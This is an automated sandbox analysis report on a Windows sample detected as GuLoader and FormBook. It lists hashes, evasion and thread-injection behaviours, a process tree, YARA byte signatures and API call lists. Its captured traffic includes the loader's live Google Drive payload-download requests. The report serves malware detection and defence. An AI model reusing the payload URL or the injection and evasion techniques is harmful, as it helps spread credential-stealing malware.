Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rResegregation.exe

Overview

General Information

Sample name:rResegregation.exe
Analysis ID:1400163
MD5:b64f1f87fdc7e8bd3d053d058fc08f4e
SHA1:c3ef7dfe21793f4c98a0b98fa0d8e9b4a00a884c
SHA256:92437485dda44372ed6d0baa2e1ff1593e0d43e5c6ef20918a393d83153a1a94
Infos:

Detection

FormBook, GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • rResegregation.exe (PID: 2956 cmdline: C:\Users\user\Desktop\rResegregation.exe MD5: B64F1F87FDC7E8BD3D053D058FC08F4E)
    • rResegregation.exe (PID: 5024 cmdline: C:\Users\user\Desktop\rResegregation.exe MD5: B64F1F87FDC7E8BD3D053D058FC08F4E)
      • xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe (PID: 4808 cmdline: "C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrshost.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\winrshost.exe MD5: 9EB3371F7B80A434CC9F468B330A9928)
          • RAVCpl64.exe (PID: 7920 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
          • explorer.exe (PID: 5344 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b370:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1538f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.28752832983.0000000005595000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x493f69:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x47df88:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 4 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: rResegregation.exeReversingLabs: Detection: 44%
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: rResegregation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.217.12.142:443 -> 192.168.11.20:50222 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.72.225:443 -> 192.168.11.20:50223 version: TLS 1.2
        Source: rResegregation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrshost.pdb source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: rResegregation.exe, rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp, winrshost.exe
        Source: Binary string: mshtml.pdbUGP source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: winrshost.pdbGCTL source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: rResegregation.exe, rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: rResegregation.exe, 00000002.00000002.28912695963.0000000036B50000.00000004.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.0000000007569000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46
        Source: rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/2
        Source: rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/9
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28782078129.0000000007573000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.000000000757B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download
        Source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
        Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
        Source: unknownHTTPS traffic detected: 172.217.12.142:443 -> 192.168.11.20:50222 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.72.225:443 -> 192.168.11.20:50223 version: TLS 1.2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00405063 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405063

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F34E0 NtCreateMutant,LdrInitializeThunk,2_2_377F34E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_377F2D10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_377F2B90
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F4570 NtSuspendThread,2_2_377F4570
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F4260 NtSetContextThread,2_2_377F4260
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2F30 NtOpenDirectoryObject,2_2_377F2F30
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2F00 NtCreateFile,2_2_377F2F00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2FB0 NtSetValueKey,2_2_377F2FB0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2E50 NtCreateSection,2_2_377F2E50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2E00 NtQueueApcThread,2_2_377F2E00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2ED0 NtResumeThread,2_2_377F2ED0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2EC0 NtQuerySection,2_2_377F2EC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2EB0 NtProtectVirtualMemory,2_2_377F2EB0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2E80 NtCreateProcessEx,2_2_377F2E80
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2D50 NtWriteVirtualMemory,2_2_377F2D50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2DC0 NtAdjustPrivilegesToken,2_2_377F2DC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2DA0 NtReadVirtualMemory,2_2_377F2DA0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C50 NtUnmapViewOfSection,2_2_377F2C50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F3C30 NtOpenProcessToken,2_2_377F3C30
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C30 NtMapViewOfSection,2_2_377F2C30
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C20 NtSetInformationFile,2_2_377F2C20
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C10 NtOpenProcess,2_2_377F2C10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2CF0 NtDelayExecution,2_2_377F2CF0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2CD0 NtEnumerateKey,2_2_377F2CD0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F3C90 NtOpenThread,2_2_377F3C90
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B20 NtQueryInformationProcess,2_2_377F2B20
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B10 NtAllocateVirtualMemory,2_2_377F2B10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B00 NtQueryValueKey,2_2_377F2B00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2BE0 NtQueryVirtualMemory,2_2_377F2BE0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2BC0 NtQueryInformationToken,2_2_377F2BC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B80 NtCreateKey,2_2_377F2B80
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2A10 NtWriteFile,2_2_377F2A10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2AC0 NtEnumerateValueKey,2_2_377F2AC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2AA0 NtQueryInformationFile,2_2_377F2AA0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2A80 NtClose,2_2_377F2A80
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F29F0 NtReadFile,2_2_377F29F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F29D0 NtWaitForSingleObject,2_2_377F29D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F38D0 NtGetContextThread,2_2_377F38D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031134E0 NtCreateMutant,LdrInitializeThunk,5_2_031134E0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03112B10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B00 NtQueryValueKey,LdrInitializeThunk,5_2_03112B00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03112B90
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B80 NtCreateKey,LdrInitializeThunk,5_2_03112B80
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_03112BC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112A80 NtClose,LdrInitializeThunk,5_2_03112A80
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031129F0 NtReadFile,LdrInitializeThunk,5_2_031129F0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112F00 NtCreateFile,LdrInitializeThunk,5_2_03112F00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112E50 NtCreateSection,LdrInitializeThunk,5_2_03112E50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_03112D10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C30 NtMapViewOfSection,LdrInitializeThunk,5_2_03112C30
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112CF0 NtDelayExecution,LdrInitializeThunk,5_2_03112CF0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03114260 NtSetContextThread,5_2_03114260
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03114570 NtSuspendThread,5_2_03114570
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B20 NtQueryInformationProcess,5_2_03112B20
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112BE0 NtQueryVirtualMemory,5_2_03112BE0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112A10 NtWriteFile,5_2_03112A10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112AA0 NtQueryInformationFile,5_2_03112AA0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112AC0 NtEnumerateValueKey,5_2_03112AC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031129D0 NtWaitForSingleObject,5_2_031129D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031138D0 NtGetContextThread,5_2_031138D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112F30 NtOpenDirectoryObject,5_2_03112F30
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112FB0 NtSetValueKey,5_2_03112FB0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112E00 NtQueueApcThread,5_2_03112E00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112E80 NtCreateProcessEx,5_2_03112E80
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112EB0 NtProtectVirtualMemory,5_2_03112EB0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112ED0 NtResumeThread,5_2_03112ED0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112EC0 NtQuerySection,5_2_03112EC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112D50 NtWriteVirtualMemory,5_2_03112D50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112DA0 NtReadVirtualMemory,5_2_03112DA0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112DC0 NtAdjustPrivilegesToken,5_2_03112DC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C10 NtOpenProcess,5_2_03112C10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03113C30 NtOpenProcessToken,5_2_03113C30
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C20 NtSetInformationFile,5_2_03112C20
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C50 NtUnmapViewOfSection,5_2_03112C50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03113C90 NtOpenThread,5_2_03113C90
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112CD0 NtEnumerateKey,5_2_03112CD0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Windows\hotdoggen.iniJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004048A20_2_004048A2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C27602_2_377C2760
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CA7602_2_377CA760
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378767572_2_37876757
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E46702_2_377E4670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787A6C02_2_3787A6C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378336EC2_2_378336EC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787F6F62_2_3787F6F6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DC6002_2_377DC600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BC6E02_2_377BC6E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786D6462_2_3786D646
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C06802_2_377C0680
